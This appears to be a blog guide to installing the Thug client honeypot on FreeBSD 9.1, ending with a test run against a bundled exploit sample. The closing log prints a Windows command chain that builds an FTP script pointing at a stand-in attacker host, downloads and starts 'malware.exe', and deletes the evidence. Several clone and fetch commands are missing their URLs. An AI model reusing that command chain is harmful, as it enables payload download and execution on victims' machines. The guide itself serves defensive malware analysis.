Thug is a low-interaction client honeypot used for analyzing web-based, client-side attacks. As client-side attacks become more obfuscated and difficult to analyze, Thug can be used to emulate the behavior of a web browser (16 different User-Agents at time of writing) to detect malicious web pages while creating detailed logs and saving payloads.

While looking into Thug I found that there wasn't an existing guide for installing it on FreeBSD. The Thug build documentation is good, but I found it makes a number of assumptions on prerequisites already being installed. After some trial and error I've documented the entire process I used to get Thug running on a fresh FreeBSD 9.1 image.

The following guide was done on a minimal install of FreeBSD 9.1(i386) with only the 'SSH Server' chosen during installation. Also, all commands are run as the 'root' user.

First we'll install any security updates for the OS and install the latest ports tree:

freebsd-update fetch install
portsnap fetch extract

The Portmaster utility will be used to build and install most of the required packages so we'll install that next:

cd /usr/ports/ports-mgmt/portmaster/ && make -DBATCH install clean

At the time of writing there was an issue with the distro sites for 'pkgconf' so manually download the port tarball:

cd /usr/ports/distfiles; fetch

I also don't want a full X11 installation, just the minimal dependancies, so I add a global 'make' option to /etc/make.conf:

echo "WITHOUT_X11=yes" >> /etc/make.conf

Now install the required tools, libraries and Python modules:

portmaster -dG --no-confirm \
devel/subversion        \
devel/git               \
devel/boost-libs        \
devel/boost-python-libs \
devel/autoconf          \
devel/libtool           \
devel/libexecinfo       \
devel/py-zope.interface \
www/py-beautifulsoup    \
www/py-cssutils         \
www/py-httplib2         \
devel/py-pefile         \
www/py-html5lib         \
textproc/py-chardet     \
devel/py-parsing        \
graphics/py-pydot       \

The remaining packages will be built manually so we'll create a directory to work from:

mkdir /usr/local/src; cd /usr/local/src

Grab the Thug source from GitHub:

git clone /opt/thug
Google V8

Pull the latest V8 code from Google Code and apply the required Thug patch:

svn checkout v8
patch -p0 < /opt/thug/patches/V8-patch1.diff
setenv V8_HOME /usr/local/src/v8

Pull revision 478 of PyV8 from Google Code, build and install:

svn checkout -r478 pyv8
cd pyv8
python build
python install

Libemu is for X86 emulation and shellcode detection:

cd /usr/local/src
git clone git://
cd libemu
autoreconf -v -i
./configure --prefix=/opt/libemu
make install

Now add the Libemu libraries to the shared library cache:

ldconfig -m /opt/libemu/lib

Pylibemu is a Python wrapper for the Libemu library:

cd /usr/local/src
git clone git://
cd pylibemu
python build
python install

You should now have a fully functional Thug installation! You can test it out with some of the samples that come with the Thug source:

python /opt/thug/src/ -l /opt/thug/samples/exploits/hpinfo1.html


[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">
[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo IDidntDoAnything>> c:\ftpd&echo password>> c:    \ftpd&echo binary>> c:\ftpd&echo get malware.exec:\malware.exe >> c:\ftpd&echo quit>> c:\ftpd
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo cd c:\>> c:\ftpd.bat&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\malware.exe >> c:\ftpd.bat
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd&del c:\malware.exe
[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846


comments powered by Disqus